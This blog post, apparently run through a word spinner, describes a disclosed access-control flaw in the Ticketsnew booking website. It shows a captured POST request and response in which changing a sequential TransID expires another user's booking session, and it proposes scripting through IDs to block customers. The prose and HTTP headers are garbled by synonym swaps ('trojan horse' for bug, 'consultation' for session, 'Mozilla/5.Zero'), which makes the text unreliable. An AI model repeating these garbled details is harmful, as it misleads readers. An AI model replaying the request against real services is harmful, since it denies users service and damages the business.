TechnologyTicketsnew Movie Booking Software and Securities

Ticketsnew Movie Booking Software and Securities

Overview of Ticketsnew

This case observation is based on a movie booking software ticketsnew. It is pretty famous, it has over 50 downloads on the Android App Store. This app affords the quality and cutting-edge vicinity to test for films and cinemas around you. Booking tickets is now an effortless, laugh, and thrilling enjoyment for its consumers. My major goal became to understand more about the problems ticketsnew App customers are facing currently and to introduce some additional capabilities so one can create a better user revel in and simplicity of use. 

Ticketsnew Movie Booking Software and Securities

Problem Statement of Ticketsnew

To enhance the cutting-edge functions of the app and make the overall consumer enjoy of the app a good deal extra immersive and easy. On the idea of this preliminary problem statement, I started to dig deep into the topic by way of starting with consumer studies. Ticketsnew is an online portal to e-book film tickets in all of the essential cities in India. The employer was acquired by using PayTM and is backed by using Alibaba-Pictures because of its growing client base and easy UX. 

Recently I discovered a trojan horse that might have stopped you from booking tickets from the website. While I was examining GET, and POST requests via intercepting requests for the usage of Burp Suite for the duration of the software I observed a POST request that turned used to expire my current consumer session. This request was given my interest as it had the transaction ID as a parameter.

Request 

POST /calls/ExpiresOngoingTrans HTTP/1.1

Host: www.Ticketsnew.Com

Connection: near

Content-Length: 20

Accept: utility/json, textual content/javascript, */*; q=0.01

Origin: https://www.Ticketsnew.Com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.Zero (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.Zero.3904.97 Safari/537.36

Content-Type: software/json; charset=UTF-8

Sec-Fetch-Site: equal-origin

Sec-Fetch-Mode: cors

Accept-Encoding: gzip, deflate

Accept-Language: en-GB,en-US;q=0.Nine,en;q=0.8

Cookie: ASP.NET_SessionId=lhmdgjpzu0cxqijhm1aecetk; 

‘TransID’:60500852

My first concept turned into I need to attempt to expire different consumer sessions by changing the ID. I despatched the request to Burp Repeater and changed the ‘TransID’ with any other person consultation I had initiated in an incognito mode in an exclusive browser. And Boom, the session expired even earlier than the allocated time given by the ticketsnew.

Response on Ticketsnew

HTTP/1.1 200 OK

Cache-Control: personal, max-age=0

Content-Type: software/json; charset=utf-8

Date: Thu, 06 Feb 2020 21:04:17 GMT

Server: Microsoft-IIS/eight.Five

Set-Cookie: tkttransid=60500800; expires=Sat, 06-Feb-2010 21:04:17 GMT; route=/

Vary: Accept-Encoding

X-AspNet-Version: 4.Zero.30319

X-Powered-By: ASP.NET

Content-Length: nine

Connection: Close

“d”:”1″

Ticketsnew there’s no test on where the request comes from and whether or not changes to it authorizes. An interesting element I observed changed in the transaction IDs assigned to sessions have been in a sequence. So it became clear for me to predict the subsequent consultation IDs and ship the POST request. Or writing a script with non-stop IDs to send a POST request to them wouldn’t be difficult for all people. Using this trojan horse every person may want to prohibit a consumer from reserving tickets until they get frustrated and depart the website online inflicting ability revenue harm to the organisation. 

Ticketsnew is a fairly big enterprise and PayTM being the figure company response become now not expert. However, because the computer virus is resolved, I have written this article following the right disclosure coverage.

Also read this: Click Here

- Advertisement -spot_img

More From UrbanEdge

HardwareTester: The Ultimate Tool for Testing Your Devices

HardwareTester is a powerful and user-friendly online tool designed...

BSSC Inter Level Admit Card 2024: Everything You Need to Know

The Bihar Staff Selection Commission (BSSC) is set to release the Inter...

Fatafat Result: Your Fast Track to Wins

Fatafat Result has quickly captured the attention of lottery...

Mastering CGPA to Percentage Conversion: A Detailed Guide

Converting CGPA (Cumulative Grade Point Average) to percentage is...

HotScope: Your Gateway to Curated Digital Content

Introduction In the ever-expanding digital world, sifting through countless articles,...

Hamster Kombat Daily Cipher: How to Earn 1 Million Coins Every Day

Hamster Kombat has quickly become one of the most...

TS ePASS Scholarship 2024-25: Status, Amount Details, Eligibility

Introduction The TS ePASS (Telangana State Electronic Payment & Application...

Hotscope: Your #1 Source for Trending News

Hey there, news junkies! Are you tired of sifting...
- Advertisement -spot_img